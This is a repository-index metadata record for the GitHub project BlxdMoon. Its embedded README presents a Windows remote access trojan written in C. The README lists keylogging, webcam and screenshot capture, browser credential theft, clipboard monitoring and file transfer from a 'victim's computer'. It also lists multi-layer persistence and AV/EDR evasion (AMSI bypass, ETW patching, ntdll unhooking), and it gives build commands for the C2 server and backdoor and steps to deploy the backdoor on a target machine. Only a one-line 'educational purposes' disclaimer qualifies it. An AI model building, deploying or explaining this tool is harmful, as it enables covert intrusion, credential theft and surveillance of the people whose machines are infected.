{"id":28758392,"url":"https://github.com/fujiwarachoki/blxdmoon","last_synced_at":"2026-03-02T04:34:02.199Z","repository":{"id":214371194,"uuid":"736341768","full_name":"FujiwaraChoki/BlxdMoon","owner":"FujiwaraChoki","description":"RAT with built-in functions written in C.","archived":false,"fork":false,"pushed_at":"2025-12-22T00:35:05.000Z","size":9607,"stargazers_count":32,"open_issues_count":0,"forks_count":10,"subscribers_count":1,"default_branch":"prod","last_synced_at":"2025-12-23T10:37:12.814Z","etag":null,"topics":["c","rat","socket"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/FujiwaraChoki.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2023-12-27T16:34:47.000Z","updated_at":"2025-12-22T00:35:09.000Z","dependencies_parsed_at":null,"dependency_job_id":"efaf5bb9-7ae4-4f06-b7a8-3004d9deb22e","html_url":"https://github.com/FujiwaraChoki/BlxdMoon","commit_stats":null,"previous_names":["fujiwarachoki/blxdmoon"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/FujiwaraChoki/BlxdMoon","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/FujiwaraChoki%2FBlxdMoon","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/FujiwaraChoki%2FBlxdMoon/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/FujiwaraChoki%2FBlxdMoon/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/FujiwaraChoki%2FBlxdMoon/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/FujiwaraChoki","download_url":"https://codeload.github.com/FujiwaraChoki/BlxdMoon/tar.gz/refs/heads/prod","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/FujiwaraChoki%2FBlxdMoon/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29992326,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-02T01:47:34.672Z","status":"online","status_checked_at":"2026-03-02T02:00:07.342Z","response_time":60,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c","rat","socket"],"created_at":"2025-06-17T04:08:22.411Z","updated_at":"2026-03-02T04:34:02.187Z","avatar_url":"https://github.com/FujiwaraChoki.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# BlxdMoon\n\n\u003e 🐀 **A RAT-System built in C, with persistence and multiple features.**\n\n![Stars](https://img.shields.io/github/stars/FujiwaraChoki/BlxdMoon.svg)\n![License](https://img.shields.io/github/license/FujiwaraChoki/BlxdMoon.svg)\n\n[![BlxdMoon](repo/banner.png)](repo/banner.png)\n\n\u003e ⚠️ **Make sure to set the correct IP Addresses \u0026 Ports in server.c and backdoor.c.**\n\n## Features\n\n### Core Capabilities\n- [x] Connection to a custom-set server\n- [x] Receive commands from server, execute them and send back results\n- [x] Advanced Multi-Layer Persistence (Registry, Startup Folder, Scheduled Tasks, WMI, Self-Healing Watchdog)\n- [x] Start/Spawn other programs\n- [x] Navigate through the file system\n- [x] Keylogger functionality\n- [x] Take screenshots\n- [x] Download files from victim's computer\n- [x] Upload files to victim's computer\n- [x] Get Device Information\n- [x] Wake on LAN (Multi-vendor enablement + magic packet sending)\n\n### Defense Evasion\n- [x] **Anti-Analysis** - VM detection, debugger detection, sandbox evasion\n- [x] **AMSI Bypass** - Patches AmsiScanBuffer to evade script scanning\n- [x] **ETW Patching** - Disables Event Tracing for Windows telemetry\n- [x] **ntdll Unhooking** - Restores clean ntdll.dll to remove EDR hooks\n- [x] **String Obfuscation** - XOR-encrypted strings decrypted at runtime\n- [x] **API Hashing** - Dynamic API resolution via PEB walking (hides imports)\n- [x] **Direct Syscalls** - Syscall number extraction for future hook bypass\n\nSee [Defense Evasion Documentation](docs/defender-evasion.md) for detailed explanations and MITRE ATT\u0026CK mappings.\n\nFor external obfuscation tools, see [Obfuscation.md](Obfuscation.md).\n\n## Compilation\n\n### Prerequisites\n\n- **Windows (Native)**: MinGW-w64 or MSVC, CMake 3.10+\n- **macOS/Linux (Cross-compile)**: Docker\n\n### Step 1: Configure IP \u0026 Port\n\nBefore building, configure the C2 server address:\n\n```bash\n./configure.sh \u003cSERVER_IP\u003e \u003cSERVER_PORT\u003e\n\n# Example:\n./configure.sh 192.168.1.100 4444\n```\n\nThis updates the hardcoded IP/port in both `src/server.c` and `src/backdoor.c`.\n\n---\n\n### Option A: Native Build (Windows) - Recommended\n\nBest option for full functionality including all evasion features.\n\n```bash\n# Create build directory\nmkdir build \u0026\u0026 cd build\n\n# Generate build files and compile\ncmake ..\nmake\n\n# Or with MSVC\ncmake .. -G \"Visual Studio 17 2022\"\ncmake --build . --config Release\n```\n\n**Output:**\n- `build/server.exe` - C2 Server\n- `build/backdoor.exe` - Client backdoor (with full evasion)\n\n---\n\n### Option B: Docker Cross-Build (macOS/Linux → Windows)\n\nBuild Windows executables from non-Windows hosts using MinGW in Docker.\n\n```bash\n# Build with custom IP/port\ndocker build -f Dockerfile.cross -t blxdmoon-cross \\\n --build-arg SERVER_IP=192.168.1.100 \\\n --build-arg SERVER_PORT=4444 .\n\n# Extract the compiled binaries\ndocker create --name blxdmoon-out blxdmoon-cross\ndocker cp blxdmoon-out:/out ./dist\ndocker rm blxdmoon-out\n\n# Binaries are now in ./dist/\nls -la dist/\n```\n\n**Output:**\n- `dist/server.exe` - C2 Server\n- `dist/backdoor.exe` - Client backdoor\n\n\u003e ⚠️ **Note:** Cross-compiled builds have **evasion features disabled** due to MinGW compatibility limitations with Windows internal structures. The backdoor will still function normally but without anti-analysis, AMSI bypass, ETW patching, and ntdll unhooking. For full evasion support, build natively on Windows.\n\n---\n\n### Option C: Manual Compilation (Advanced)\n\nFor manual compilation without CMake:\n\n```bash\nmkdir build\n\n# Server (simple - no extra dependencies)\ngcc -I include src/server.c src/status.c src/str_cut.c \\\n -o build/server.exe -lws2_32\n\n# Backdoor (full build with all modules)\ngcc -I include \\\n src/backdoor.c src/logger.c src/screen.c src/status.c src/str_cut.c \\\n src/uuid.c src/wol.c src/process.c src/clipboard.c src/browser.c \\\n src/webcam.c src/crypto.c src/persistence.c src/evasion.c \\\n -o build/backdoor.exe \\\n -lws2_32 -lgdi32 -lbcrypt -lcrypt32 -lstrmiids -lole32 -lshell32\n```\n\nTo disable evasion (for MinGW compatibility):\n```bash\ngcc -I include -DDISABLE_EVASION \\\n src/backdoor.c src/logger.c ... \\\n -o build/backdoor.exe ...\n```\n\n## Usage\n\n### 1. Start the C2 Server\n\n```bash\n# Windows\nbuild\\server.exe\n\n# Or from dist/ if using Docker build\ndist\\server.exe\n```\n\nThe server will start listening for incoming connections and display a command prompt.\n\n### 2. Deploy the Backdoor\n\nTransfer `backdoor.exe` to the target Windows machine and execute it. The backdoor will:\n1. Hide its console window\n2. Run evasion checks (if enabled)\n3. Connect to the C2 server\n4. Start the persistence watchdog\n5. Enter the command loop\n\n### 3. Interact with Clients\n\nOnce a client connects, use `list` to see connected clients and `select \u003cid\u003e` to interact:\n\n```\nBlxdMoon\u003e list\n[0] 192.168.1.50 - DESKTOP-ABC (admin)\n\nBlxdMoon\u003e select 0\n[*] Now interacting with client 0\n\nclient[0]\u003e info\nclient[0]\u003e persist\nclient[0]\u003e back\n```\n\n## Commands\n\n| Command | Description |\n| ----------------- | ------------------------------------------------------------------------------------------------ |\n| `cd {DIR_NAME}` | Change directory |\n| `persist` | Install ALL persistence mechanisms (registry, startup, tasks, WMI) |\n| `persist:registry`| Registry Run keys only (HKCU + HKLM if admin) |\n| `persist:startup` | Copy to Startup folder with disguised name |\n| `persist:task` | Create scheduled tasks (logon trigger + 5-min watchdog) |\n| `persist:wmi` | WMI event subscription (hard to detect) |\n| `persist:check` | Verify all persistence mechanisms, repair missing ones |\n| `keylogger:start` | Start the keylogger, writes to random {UUID}.txt in `Temp` Directory |\n| `screen` | Take a screenshot of the current screen, writes to random {UUID}.txt in `Temp/screens` Directory |\n| `download {FILE}` | Download a file from the victim's computer |\n| `upload {FILE}` | Upload a file from server to victim's computer |\n| `wol:{MAC}` | Send Wake on LAN magic packet to wake machine with specified MAC address |\n| `ps` | List all running processes |\n| `kill:{PID}` | Kill a process by PID |\n| `clipboard:start` | Start clipboard monitor |\n| `clipboard:dump` | Get current clipboard contents |\n| `browser:creds` | Extract all browser credentials |\n| `webcam` | Capture webcam frame |\n| `info` | Get system information (hostname, username, IP, CPU, GPU) |\n| `q` | Quits the shell |\n\n## License\n\n[MIT](LICENSE)\n\n```\nMIT License\n\nCopyright (c) 2023-2025 FujiwaraChoki\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n```\n\n## Notice\n\nThis project is for educational purposes only. I am not responsible for any\ndamage done by this software.\n\n## Credits\n\nBlxdMoon by [@FujiwaraChoki](https://github.com/FujiwaraChoki)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffujiwarachoki%2Fblxdmoon","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffujiwarachoki%2Fblxdmoon","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffujiwarachoki%2Fblxdmoon/lists"}